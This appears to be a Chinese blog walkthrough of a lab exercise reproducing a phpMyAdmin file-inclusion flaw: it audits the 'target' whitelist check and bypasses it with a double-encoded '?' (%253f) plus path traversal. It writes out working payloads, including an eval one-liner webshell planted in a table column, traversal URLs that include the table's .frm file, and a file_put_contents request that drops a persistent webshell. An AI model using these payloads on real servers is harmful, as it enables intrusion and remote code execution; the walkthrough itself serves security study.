phpmyadmin漏洞复现——本地文件包含与远程包含

最新推荐文章于 2022-07-05 00:51:51 发布
最新推荐文章于 2022-07-05 00:51:51 发布
阅读量472 收藏 1
点赞数 1
分类专栏: # php代码审计 文章标签: 白箱测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43264067/article/details/106176954
版权

本地文件包含与远程包含

原理:攻击者利用包含的特性,加上应用本身对文件(包含)控制不严格,最终造成攻击者进行任意文件包含。(注:包含的文件会被当成脚本文件来解析)
一句话来说就是:文件包含并不属于漏洞,但是,由于对包含进来的文件不可控,导致了文件包含漏洞的产生。
包含文件很有用,可以简化代码;文件包含分为本地和远程文件包含(需要allow_url_include = On);本地文件包含LFI 远程文件包含 RFI
首先我们来了解4个函数(php)

**1.include:**使用include引用外部文件时,只有代码执行到include代码段时,调用的外部文件才会被引用并读取,当引用的文件发生错误时,系统只会给出个警告错误,而整个php文件会继续执行。

**2.require:**在php文件被执行之前,php解析器会用被引用的文件的全部内容替换require语句,然后与require语句之外的其他语句组成个新的php文件,最后按新的php文件执行程序代码。

3.使用include_once会在导入文件前先检测该文件是否在该页面的其他部分被引用过,如果有,则不会重复引用该文件,程序只能引用一次。(要导入的文件中存在一些自定义函数,那么如果在同一个程序中重复导入这个文件,在第二次导入时便会发生错误,因为php不允许相同名称的函数被重复声明)

4.require_once语句是require语句的延伸,他的功能与require语句基本一致,不同的是,在应用require_once时,先会检查要引用的文件是不是已将在该程序中的其他地方被引用过,如果有,则不会在重复调用该文件。(同时使用require_once语句在同一页面中引用了两个不同的文件,那么在输出时,只有第一个文件被执行,第二个引用的文件则不会被执行)

如果遇到包含的文件需要传参时候,可以写http://192.168.19.131/lfi/2.php?a=1.txt&q=phpinfo();
一个&符号就可以了

下面就是靶场的操作


phpmyadmin的后台

下载源码
找文件包含的漏洞要找require或者include关键字,直接用seay源码审计系统进行全局搜索


直接找到了这个文件,这很明显极有可能存在文件包含的漏洞

我们认真看一下它if语句的满足的4个条件:

  1. 百度搜索一下empty(),这个函数,发现它是只要有传参就会返回false,再加上一个非,就是只要有传参就可以
  2. is_string(),这个函数就是只要是字符串就可以
  3. 不能以/index/开头
  4. 非$target_blacklist数组中
  5. 满足Core类中的checkPageValidity函数

第三点,我们搜索


发现只需要不要这两个php文件就可以了

第四点,我们继续搜索这个checkPageValidity()函数


它有好多if,我们不用管,只需要满足一个if的分支条件是true就可以了
我们先看第一个if,没什么用
第二个是false没用
第三个是true,它要在白名单内,肯定不能任意文件包含

突然,我们看到一个这样的文件,它先是给$_page传参,并且进行了一次url解码,而我们在url栏进行传参的时候就已经编码了一次,这里它再次进行了编码

我们发现它有一个mb_strops()函数,这是一个匹配函数,只要匹配成功就会执行,并且不会去匹配参数后面的东西,我们发现它是在末尾搞了一个.?,拼接上去。

它匹配的又是字符串,好 ,我们是不是可以传参一个参数的时候输入一个?,传参进去,然后它会提前进行匹配,后面的字符它不会去管,我们可以去控制这个参数,让前面的include()去包含我们想让让它去包含的参数

因为它经过二次编码,所以我们找到%25、以及%3f (?),直接拼接成**%253f**,我们在本地运行实验,发现它会字段去忽略25这个数字,返回的仍然是?

于是我们构造,利用白名单中的db_datadict.php%253f/…/,它识别了白名单返回一个true,同时因为我们中止了,后面的…/…/也会传参进去,然后跳回根目录

接下来,找到了漏洞存在的地方,就要去找根目录了,我们一般只有后台的权限,我们要找一个地方去上传一个文件,再让它去包含。

我们在本地文件找找,找到data目录下admin_config.frm,打开,发现里面定义了表列名


我们在在后台创建一个数据库和一个表,表其中一个列为<?php @eval($_REQUEST[‘a’]);?> 一句话码

我们在变量中找到安装路径,制作木马传参

target=db_datadict.php%253f/…/…/…/…/…/…/…/…/…/phpStudy/MySQL/data/archivedlog/archivedlog.frm&a=phpinfo();

我们直接尝试一下传参
url :
http://59.63.200.79:8010/lfi/phpmyadmin/index.php?target=db_datadict.php%253f/…/…/…/…/…/…/…/…/…/phpStudy/MySQL/data/archivedlog/archivedlog.frm&a=phpinfo();
成功


phpinfo()成功那我们就写个码

file_put_contents(‘ac.php’,’<?php @eval($_REQUEST[a]);?>’)

http://59.63.200.79:8010/lfi/phpmyadmin/index.php?target=db_datadict.php%253f/…/…/…/…/…/…/…/…/…/phpStudy/MySQL/data/archivedlog/archivedlog.frm&a=file_put_contents('ac.php‘,’<?php eval($_REQUEST[a])?>’);

尝试访问


上菜刀


找到flag

Xuno_
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
phpMyAdmin漏洞利用与安全防范
02-25
很多公司和个人都喜欢使用phpMyAdmin来管理MySQL数据库——在zoomeye中搜索关键字phpmyadmin,我国位居第二,如下图1所示。phpMyAdmin功能非常强大,可以执行命令,导入或者导出数据库,可以说通过phpMyAdmin可以...
phpMyAdmin】更改配置文件连接到其他server
weixin_34129696的博客
08-17 87
默认phpMyAdmin安装完毕后对机器的访问mysql,但有时我们需要访问其它server的mysql数据库,所以我们需要配置。 真,phpMyAdmin已经为我们做了配置的选项。可是须要我们进行一些手动的操作。 http:/yourphpmyadmin.com/setup/index.php 进入配置界面,这时候会出现提示  ...
phpMyAdmin】修改配置文件连接到其他服务器
weixin_33860553的博客
03-18 332
默认的phpMyAdmin在安装后会访问本机的mysql,但是有的时候我们需要访问其他的服务器的mysql数据库,所以我们需要配置来做。 果然,phpMyAdmin已经为我们做了配置的选项,但是需要我们进行一些手动的操作。 http:/yourphpmyadmin.com/setup/index.php 进入配置界面,这时候会出现提示 ...
phpmyadmin的安装过程
charliefromkansas的博客
10-10 486
配置好apache以后,将phpmyadmin文件夹复制到apache的www根目录下 然后打开浏览器访问如下地址 http://localhost:6054/phpmyadmin/setup/index.php 开始安装,但是一开始遇到一个设置问题 简单地说,需要你手动在phpmyadmin目录中创建一个名为config的文件夹并将config.inc.php复制到该文件夹中
phpmyadmin setup.php 远程包含,phpMyAdmin 4.8.1 远程文件包含漏洞复现
weixin_39532352的博客
03-28 380
0x01 漏洞简介phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。在phpMyAdmin 4.8.2 之前的 4.8.x 版本中,其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。影响范围phpMyAdmin 4.8.0phpMyAdmin 4.8.10x02 漏洞环境使用vulnhub快速搭建靶场环境启动后,访问http://yo...
PHPMyAdmin在Window下的安装
weixin_30741653的博客
06-26 136
前提条件   安装PHP 程序代码   在http://www.phpmyadmin.net/ 下载最新代码,并解压 站点建设   在IIS中创建phpmyadmin的站点 管理MySql数据库   只管理本机的Mysql数据库,则不用配置任何东西,直接访问http://phpmyadmin站点/index.php   管理多个MySql数据库     1.在phpmyadm...
Windows下 Apache + PHP + mySQL + phpMyAdmin 环境搭建 一次搞定
交流 QQ 1157222342
04-05 2229
1,本文章主要讲解 Apache + PHP + mySQL + phpMyAdmin 如何一次配置完成 2,配置过程略长,希望跟着文章一步一步操作,最后肯定可以全部配置成功(我已经把坑都踩的差不多了) 下面是我的安装环境仅做参考,实际情况根据个人版本需要进行下载 Apache部分 Apache下载:http://httpd.apache.org/ 先找到Apache版本,...
安装phpmyadmin
u013607261的专栏
02-07 185
phpmyadmin压缩包解压到web服务器目录后,点击...phpmyadmin/setup/index.php,进去后就可以安装配置了。     在配置之前在phpmyadmin根目录中创建config文件夹,配置完后,提取配置文件(config.sample.ini.php修改为config.ini.php)到phpmyadmin根目录并删除config文件夹。 1.call t
最全phpmyadmin漏洞汇总
热门推荐
kracer的博客
12-04 2万+
目录 一、phpMyAdmin简介 二、查看phpmyadmin版本 三、历史漏洞及poc利用 1、万能密码直接登入 2、CVE-2009-1151:远程代码执行 3、CVE-2012-5159:任意PHP代码攻击 4、CVE-2013-3238:远程PHP代码执行 5、WooYun-2016-199433:任意文件读取漏洞 6、CVE-2014 -8959:本地文件包含 7、CVE-2016-5734 :后台命令执行RCE 8、CVE-2017-1000499 跨站请求伪造 9、C
phpMyAdmin跨站点请求伪造漏洞
a1b2c3是弱口令
10-06 526
CVE-2019-12922 phpMyAdmin 4.9.0.1-跨站请求伪造漏洞复现 0X01 漏洞概述 安全研究人员Manuel Garcia Cardenas近日公布了最常用的管理MySQL和MariaDB数据库的应用程序phpMyAdmin中的0 day漏洞细节和PoC。 phpMyAdmin是一个用PHP编写的免费软件工具,也是用于处理MySQL或MariaDB数据库服务器的开源管理...
phpMyAdmin通过密码漏洞留后门文件
10-17
今天小编就为大家分享一篇关于phpMyAdmin通过密码漏洞留后门文件,小编觉得内容挺不错的,现在分享给大家,具有很好的参考价值,需要的朋友一起跟随小编来看看吧
phpMyAdmin 4.0.1--4.2.12 本地文件包含漏洞(CVE-2014-8959)-附件资源
03-02
phpMyAdmin 4.0.1--4.2.12 本地文件包含漏洞(CVE-2014-8959)-附件资源
文件包含漏洞
selecthch的博客
06-11 1万+
1、文件包含漏洞简介 1、1什么是文件包含          程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,无需再次编写,这种调用文件的过程一般被称为文件包含。 ...
phpmyadminV4.8.1本地文件包含漏洞复现
seek_2022的博客
07-05 2626
出于学习和技术分享的目的,本文针对phpMyadmin-v4.8.1存在的文件包含漏洞,通过代码审计结合本地搭建测试环境的方式进行漏洞复现研究,以供大家参考学习。
phpmyadmin setup.php 远程包含,phpMyAdmin setup.php脚本的任意PHP代码注入漏洞
weixin_29616999的博客
03-28 539
漏洞代码在以下环境测试通过:phpMyAdmin 2.11.4, 2.11.9.3, 2.11.9.4, 3.0.0 及 3.0.1.1版本;Linux内核版本 2.6.24-24-generic i686 GNU/Linux (Ubuntu 8.04.2);攻击环境要求:phpMyAdmin版本:早于2.11.9.5的2.11.x和早于3.1.3.1的3.x;此漏洞只针对采用向导模式安装的ph...
/phpmyadmin/index.php,http://localhost/phpmyadmin/index.php“未指定输入文件 . ”nginx Windows Server 2012 php...
weixin_28692153的博客
03-21 579
我想在 Windows Server 2012 设置nginx服务器 . 我面临的问题:当我尝试访问或http://localhost/phpmyadmin/index.php或http://localhost/test.php时,我在nginx Windows Server 2012 php 7上收到消息"No input file specified.".netstat -abn打开并监听端口...
phpmyadmin漏洞分析复现
weixin_43047908的博客
08-19 1191
目录前言环境搭建漏洞复现CVE-2016-5734CVE-2018-12613 前言 phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行,但是您可以在任何地方使用这些程式产生的HTML页面,也就是于远端管理MySQL
phpmyadmin漏洞
最新发布
07-27
引用\[1\]:根据网上公开的phpMyadmin文件包含漏洞,通过代码审计定位危险函数,然后逐步分析,最终确定payload,并通过本地搭建phpMyadminV4.8.1版本成功进行漏洞复现。实际上该漏洞对于大部分版本的phpMyadmin都...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Xuno_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值